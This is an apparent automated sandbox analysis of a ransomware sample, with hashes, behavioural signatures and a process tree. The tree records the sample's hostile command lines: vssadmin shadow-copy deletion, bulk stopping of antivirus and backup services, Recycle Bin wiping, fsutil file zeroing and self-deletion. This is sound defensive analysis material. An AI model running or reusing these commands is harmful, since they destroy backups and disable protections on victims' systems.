Analysis
max time kernel: 91s
max time network: 129s
platform: windows10_x64
resource: win10v20210410
submitted: 17-04-2021 12:03
Static task: static1
Behavioral task: behavioral1 (Sample: admin.exe, Resource: win7v20210408)
Behavioral task: behavioral2 (Sample: admin.exe, Resource: win10v20210410)
General
Target: admin.exe
Size: 63KB
MD5: ae776cbf46e5d71831c0d0d6c37b3bbf
SHA1: 3ee387589ef93afe4ed2609c0c242e29f5d164b4
SHA256: 83e2ba9faf075547be65d2b6dbd13e190a0b1c1cf626788cb756ab7a3c770dcb
SHA512: 486d0ce8e49b1ab0fd6a56d6982abad8661c35fb27343a623c7a58bf1f5a74ccff3a954d02e9713d501bb72e9dac829f459cad2f1b3cc225ce052568ee3785ee
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies extensions of user files (7 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: admin.exe
  description | ioc | process
  File created | C:\Users\Admin\Pictures\CompareSend.tiff.locked | admin.exe
  File opened for modification | C:\Users\Admin\Pictures\CompareSend.tiff | admin.exe
  File created | C:\Users\Admin\Pictures\ConfirmUndo.tiff.locked | admin.exe
  File opened for modification | C:\Users\Admin\Pictures\ConfirmUndo.tiff | admin.exe
  File created | C:\Users\Admin\Pictures\EnterRegister.tiff.locked | admin.exe
  File opened for modification | C:\Users\Admin\Pictures\EnterRegister.tiff | admin.exe
  File created | C:\Users\Admin\Pictures\LimitRead.png.locked | admin.exe
- Drops startup file (1 IoCs)
  Processes: admin.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | admin.exe
- Enumerates connected drives (3 TTPs, 18 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: vssadmin.exe (10 instances)
  description | ioc | process
  File opened (read-only) | \??\F: | vssadmin.exe
  File opened (read-only) | \??\F: | vssadmin.exe
  File opened (read-only) | \??\G: | vssadmin.exe
  File opened (read-only) | \??\g: | vssadmin.exe
  File opened (read-only) | \??\h: | vssadmin.exe
  File opened (read-only) | \??\e: | vssadmin.exe
  File opened (read-only) | \??\h: | vssadmin.exe
  File opened (read-only) | \??\H: | vssadmin.exe
  File opened (read-only) | \??\f: | vssadmin.exe
  File opened (read-only) | \??\g: | vssadmin.exe
  File opened (read-only) | \??\D: | vssadmin.exe
  File opened (read-only) | \??\H: | vssadmin.exe
  File opened (read-only) | \??\D: | vssadmin.exe
  File opened (read-only) | \??\E: | vssadmin.exe
  File opened (read-only) | \??\G: | vssadmin.exe
  File opened (read-only) | \??\f: | vssadmin.exe
  File opened (read-only) | \??\e: | vssadmin.exe
  File opened (read-only) | \??\E: | vssadmin.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 14 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (14 instances)
  pid | process
  2504 | vssadmin.exe
  2000 | vssadmin.exe
  2716 | vssadmin.exe
  4360 | vssadmin.exe
  4112 | vssadmin.exe
  2752 | vssadmin.exe
  3260 | vssadmin.exe
  5076 | vssadmin.exe
  2476 | vssadmin.exe
  2464 | vssadmin.exe
  1864 | vssadmin.exe
  4124 | vssadmin.exe
  3636 | vssadmin.exe
  1344 | vssadmin.exe
- Kills process with taskkill (3 IoCs)
  Processes: taskkill.exe (3 instances)
  pid | process
  4492 | taskkill.exe
  4176 | taskkill.exe
  4744 | taskkill.exe
- Opens file in notepad (likely ransom note) (1 IoCs)
  Processes: notepad.exe
  pid | process
  5296 | notepad.exe
- Runs net.exe
- Runs ping.exe (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes: admin.exe
  pid | process
  2016 | admin.exe (64 identical entries)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: admin.exe, taskkill.exe (3 instances), vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 2016 | admin.exe
  Token: SeDebugPrivilege | 4492 | taskkill.exe
  Token: SeDebugPrivilege | 4744 | taskkill.exe
  Token: SeDebugPrivilege | 4176 | taskkill.exe
  Token: SeBackupPrivilege | 5556 | vssvc.exe
  Token: SeRestorePrivilege | 5556 | vssvc.exe
  Token: SeAuditPrivilege | 5556 | vssvc.exe
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes: admin.exe
  pid | process
  2016 | admin.exe
- Suspicious use of SendNotifyMessage (1 IoCs)
  Processes: admin.exe
  pid | process
  2016 | admin.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: admin.exe, net.exe (6 instances)
  description | pid | process | target process
  PID 2016 wrote to memory of 2456 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 2488 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 2512 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 2764 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 3044 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 3552 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 3472 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 2768 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 1276 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 3148 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 2324 | 2016 | admin.exe | net.exe (3 entries)
  PID 2456 wrote to memory of 2716 | 2456 | net.exe | vssadmin.exe (3 entries)
  PID 2016 wrote to memory of 2208 | 2016 | admin.exe | net.exe (3 entries)
  PID 2764 wrote to memory of 3492 | 2764 | net.exe | net1.exe (3 entries)
  PID 2512 wrote to memory of 684 | 2512 | net.exe | net1.exe (3 entries)
  PID 2488 wrote to memory of 1364 | 2488 | net.exe | net1.exe (3 entries)
  PID 2016 wrote to memory of 1160 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 3152 | 2016 | admin.exe | net.exe (3 entries)
  PID 2016 wrote to memory of 1660 | 2016 | admin.exe | net.exe (3 entries)
  PID 3044 wrote to memory of 1864 | 3044 | net.exe | vssadmin.exe (3 entries)
  PID 3472 wrote to memory of 3852 | 3472 | net.exe | Conhost.exe (3 entries)
  PID 2016 wrote to memory of 2484 | 2016 | admin.exe | net.exe (1 entry)
- System policy modification (1 TTPs, 2 IoCs)
  Processes: admin.exe
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | admin.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | admin.exe
Processes
Process tree (the bracketed number is the nesting depth reported by the sandbox; each entry gives the image path, its command line, and the signatures triggered by that process):

[1] C:\Users\Admin\AppData\Local\Temp\admin.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\admin.exe"
    - Modifies extensions of user files
    - Drops startup file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop avpsus /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop avpsus /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop McAfeeDLPAgentService /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BMR Boot Service /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop BMR Boot Service /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop mfewc /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop mfewc /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop NetBackup BMR MTFTP Service /y
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop ccSetMgr /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop ccSetMgr /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop SavRoam /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop SavRoam /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop RTVscan /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop RTVscan /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop QBFCService /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop QBFCService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop YooBackup /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop YooBackup /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop stc_raw_agent /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop stc_raw_agent /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop zhudongfangyu /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop zhudongfangyu /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop YooIT /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop YooIT /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop QBCFMonitorService /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop QBCFMonitorService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop Intuit.QuickBooks.FCS /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop QBIDPService /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop QBIDPService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop ccEvtMgr /y
      - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop DefWatch /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop VeeamDeploymentService /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop VeeamDeploymentService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop VeeamTransportSvc /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop VeeamTransportSvc /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop VSNAPVSS /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop VSNAPVSS /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BackupExecDiveciMediaService /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BackupExecAgentBrowser /y
    [3] C:\Windows\SysWOW64\net1.exe
        cmdline: C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\cmd.exe
      cmdline: "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" Delete Shadows /all /quiet
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\vssadmin.exe
      cmdline: "vssadmin.exe" Delete Shadows /all /quiet
      - Interacts with shadow copies
  [2] C:\Windows\SysWOW64\taskkill.exe
      cmdline: "taskkill.exe" /IM mydesktopservice.exe /F
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\taskkill.exe
      cmdline: "taskkill.exe" /IM mydesktopqos.exe /F
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\taskkill.exe
      cmdline: "taskkill.exe" /IM mspub.exe /F
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\SysWOW64\sc.exe
      cmdline: "sc.exe" config SstpSvc start= disabled
  [2] C:\Windows\SysWOW64\sc.exe
      cmdline: "sc.exe" config SQLWriter start= disabled
  [2] C:\Windows\SysWOW64\sc.exe
      cmdline: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  [2] C:\Windows\SysWOW64\sc.exe
      cmdline: "sc.exe" config SQLTELEMETRY start= disabled
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop sophos /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop CAARCUpdateSvc /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop CASAD2DWebSvc /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop AcronisAgent /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop AcrSch2Svc /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BackupExecRPCService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BackupExecManagementService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BackupExecJobEngine /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BackupExecAgentAccelerator /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop BackupExecVSSProvider /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop PDVFSService /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop veeam /y
  [2] C:\Windows\SysWOW64\net.exe
      cmdline: "net.exe" stop VeeamNFSSvc /y
  [2] C:\Windows\SysWOW64\notepad.exe
      cmdline: "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
      - Opens file in notepad (likely ransom note)
  [2] C:\Windows\SysWOW64\cmd.exe
      cmdline: "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    [3] C:\Windows\SysWOW64\PING.EXE
        cmdline: ping 127.0.0.7 -n 3
        - Runs ping.exe
    [3] C:\Windows\SysWOW64\fsutil.exe
        cmdline: fsutil file setZeroData offset=0 length=524288 “%s”
  [2] C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\admin.exe
    [3] C:\Windows\SysWOW64\choice.exe
        cmdline: choice /C Y /N /D Y /T 3
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop ccEvtMgr /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop DefWatch /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop PDVFSService /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop BackupExecJobEngine /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop BackupExecRPCService /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop AcrSch2Svc /y
[1] C:\Windows\System32\Conhost.exe
    cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop AcronisAgent /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop CASAD2DWebSvc /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop CAARCUpdateSvc /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop sophos /y
[1] C:\Windows\system32\vssvc.exe
    cmdline: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\Conhost.exe
    cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop BackupExecManagementService /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop BackupExecVSSProvider /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop veeam /y
[1] C:\Windows\SysWOW64\net1.exe
    cmdline: C:\Windows\system32\net1 stop VeeamNFSSvc /y
[1] C:\Windows\System32\rundll32.exe
    cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
MD5: 7504b567104d256fbc540e0e5c67b227
SHA1: 8097328e9f9400b7e484e6902d18b5de24098079
SHA256: 68123104072c44fcdd581c6515f4e4cb1dc887b0def30d547db12bbb45733e06
SHA512: f82d02a526daa484e241996b0b6b56c888e6d1f06faea69911281ad2f621e1ac2c47bacacd3d54eb1fe596d023a145d618af2a24dea25591190bc38c58c574bb
- memory/684-130-0x0000000000000000-mapping.dmp
- memory/1160-132-0x0000000000000000-mapping.dmp
- memory/1276-124-0x0000000000000000-mapping.dmp
- memory/1364-131-0x0000000000000000-mapping.dmp
- memory/1660-134-0x0000000000000000-mapping.dmp
- memory/1864-135-0x0000000000000000-mapping.dmp
- memory/2016-143-0x0000000004910000-0x0000000004911000-memory.dmp (Filesize: 4KB)
- memory/2016-181-0x0000000005860000-0x0000000005861000-memory.dmp (Filesize: 4KB)
- memory/2016-114-0x0000000000130000-0x0000000000131000-memory.dmp (Filesize: 4KB)
- memory/2208-128-0x0000000000000000-mapping.dmp
- memory/2280-175-0x0000000000000000-mapping.dmp
- memory/2324-126-0x0000000000000000-mapping.dmp
- memory/2456-116-0x0000000000000000-mapping.dmp
- memory/2484-137-0x0000000000000000-mapping.dmp
- memory/2488-117-0x0000000000000000-mapping.dmp
- memory/2512-118-0x0000000000000000-mapping.dmp
- memory/2716-127-0x0000000000000000-mapping.dmp
- memory/2756-140-0x0000000000000000-mapping.dmp
- memory/2764-119-0x0000000000000000-mapping.dmp
- memory/2768-123-0x0000000000000000-mapping.dmp
- memory/3044-120-0x0000000000000000-mapping.dmp
- memory/3148-125-0x0000000000000000-mapping.dmp
- memory/3152-133-0x0000000000000000-mapping.dmp
- memory/3180-138-0x0000000000000000-mapping.dmp
- memory/3332-141-0x0000000000000000-mapping.dmp
- memory/3472-122-0x0000000000000000-mapping.dmp
- memory/3492-129-0x0000000000000000-mapping.dmp
- memory/3552-121-0x0000000000000000-mapping.dmp
- memory/3852-136-0x0000000000000000-mapping.dmp
- memory/3856-142-0x0000000000000000-mapping.dmp
- memory/4048-139-0x0000000000000000-mapping.dmp
- memory/4160-144-0x0000000000000000-mapping.dmp
- memory/4204-145-0x0000000000000000-mapping.dmp
- memory/4216-146-0x0000000000000000-mapping.dmp
- memory/4224-176-0x0000000000000000-mapping.dmp
- memory/4228-147-0x0000000000000000-mapping.dmp
- memory/4272-148-0x0000000000000000-mapping.dmp
- memory/4324-177-0x0000000000000000-mapping.dmp
- memory/4336-149-0x0000000000000000-mapping.dmp
- memory/4384-150-0x0000000000000000-mapping.dmp
- memory/4408-151-0x0000000000000000-mapping.dmp
- memory/4436-152-0x0000000000000000-mapping.dmp
- memory/4456-153-0x0000000000000000-mapping.dmp
- memory/4484-154-0x0000000000000000-mapping.dmp
- memory/4516-155-0x0000000000000000-mapping.dmp
- memory/4528-156-0x0000000000000000-mapping.dmp
- memory/4544-178-0x0000000000000000-mapping.dmp
- memory/4568-157-0x0000000000000000-mapping.dmp
- memory/4608-158-0x0000000000000000-mapping.dmp
- memory/4628-179-0x0000000000000000-mapping.dmp
- memory/4672-159-0x0000000000000000-mapping.dmp
- memory/4680-160-0x0000000000000000-mapping.dmp
- memory/4696-180-0x0000000000000000-mapping.dmp
- memory/4704-161-0x0000000000000000-mapping.dmp
- memory/4736-162-0x0000000000000000-mapping.dmp
- memory/4748-163-0x0000000000000000-mapping.dmp
- memory/4784-164-0x0000000000000000-mapping.dmp
- memory/4804-165-0x0000000000000000-mapping.dmp
- memory/4816-166-0x0000000000000000-mapping.dmp
- memory/4856-167-0x0000000000000000-mapping.dmp
- memory/4888-168-0x0000000000000000-mapping.dmp
- memory/4920-169-0x0000000000000000-mapping.dmp
- memory/4964-170-0x0000000000000000-mapping.dmp
- memory/5004-171-0x0000000000000000-mapping.dmp
- memory/5020-172-0x0000000000000000-mapping.dmp
- memory/5032-173-0x0000000000000000-mapping.dmp
- memory/5088-174-0x0000000000000000-mapping.dmp